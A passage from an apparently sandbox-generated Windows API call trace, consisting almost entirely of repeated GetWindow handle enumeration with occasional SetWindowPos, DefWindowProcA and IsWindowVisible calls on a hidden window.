(hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.445] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.445] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.445] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.445] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.445] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.445] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.445] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.445] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.445] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.445] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.445] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.445] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.445] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.446] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.446] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.446] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.446] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.446] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.446] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.446] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.446] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.446] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.446] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.446] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.446] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.446] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.446] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.446] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.446] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.446] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.446] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.446] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.446] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.446] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.446] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.446] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.446] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.447] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.447] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.447] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.447] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.447] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.447] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.447] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.447] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.447] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.447] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.447] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.447] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.447] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.447] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.447] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.447] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.447] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.447] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.447] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.447] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.447] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.447] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.447] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.447] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.447] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.447] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.447] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.447] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.448] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.448] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.448] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.448] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.448] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.448] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.448] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.448] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.448] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.448] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.448] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.448] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.448] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.448] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.448] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.448] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.448] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.448] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.448] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.448] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.448] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.448] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.448] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.448] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.448] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.448] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.448] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.448] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.449] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.449] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.449] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.449] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.449] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.449] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.449] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.449] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.449] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.449] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.449] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.449] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.449] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.449] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.449] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.449] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.449] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.449] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.449] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.449] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.449] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.449] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.449] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.449] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.449] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.449] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.449] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.449] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.449] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.449] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.449] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.449] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.450] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.450] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.450] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.450] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.450] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.450] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.450] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.450] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.450] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.450] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.450] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.450] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.450] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.450] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.450] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.450] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.450] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.450] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.450] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.450] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.450] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.450] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.450] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.450] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.450] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.450] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.450] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.450] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.450] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.450] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.450] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.451] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.451] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.451] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.451] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.451] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.451] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.451] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.451] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.451] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.451] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.451] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.451] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.451] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.451] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.451] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.451] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.451] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.451] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.451] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.451] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.451] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.451] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.451] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.451] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.451] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.451] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.451] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.451] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.451] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.452] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.452] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.452] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.452] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.452] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.452] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.452] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.452] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.452] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.452] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.452] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.452] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.452] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.452] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.452] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.452] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.452] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.452] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.452] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.452] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.452] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.452] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.452] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.452] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.452] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.452] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.453] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.453] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.453] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.453] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.453] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.453] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.453] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.453] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.453] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.453] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.453] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.453] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.453] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.453] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.453] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.453] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.453] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.453] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.453] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.453] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.453] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.453] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.453] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.453] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.453] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.454] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.454] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.454] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.454] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.454] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.454] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.454] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.454] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.454] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.454] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.454] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.454] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.454] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.454] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.454] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.454] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.454] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.454] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.454] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.454] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.454] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.454] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.454] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.454] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.455] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.455] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.455] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.455] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.455] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.455] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.455] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.455] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.455] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.455] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.455] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.455] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.455] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.455] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.455] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.455] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.455] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.455] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.455] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.455] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.455] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.455] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.455] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.455] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.455] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.456] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.456] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.456] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.456] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.456] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.456] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.456] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.456] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.456] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.456] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.456] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.456] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.456] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.456] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.456] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.456] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.456] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.456] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.456] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.456] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.456] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.456] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.456] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.456] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.456] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.456] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.457] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.457] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.457] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.457] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.457] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.457] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.457] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.457] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.457] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.457] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.457] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.457] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.457] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.457] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.457] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.457] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.457] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.457] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.457] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.457] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.457] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.457] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.457] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.457] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.457] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.457] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.457] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.457] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.457] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.457] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.457] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.458] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.458] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.458] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.458] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.458] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.458] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.458] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.458] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.458] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.458] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.458] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.458] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.458] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.458] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.458] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.458] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.458] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.458] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.458] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.458] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.458] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.458] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.458] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.458] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.458] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.458] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.458] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.458] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.458] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.459] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 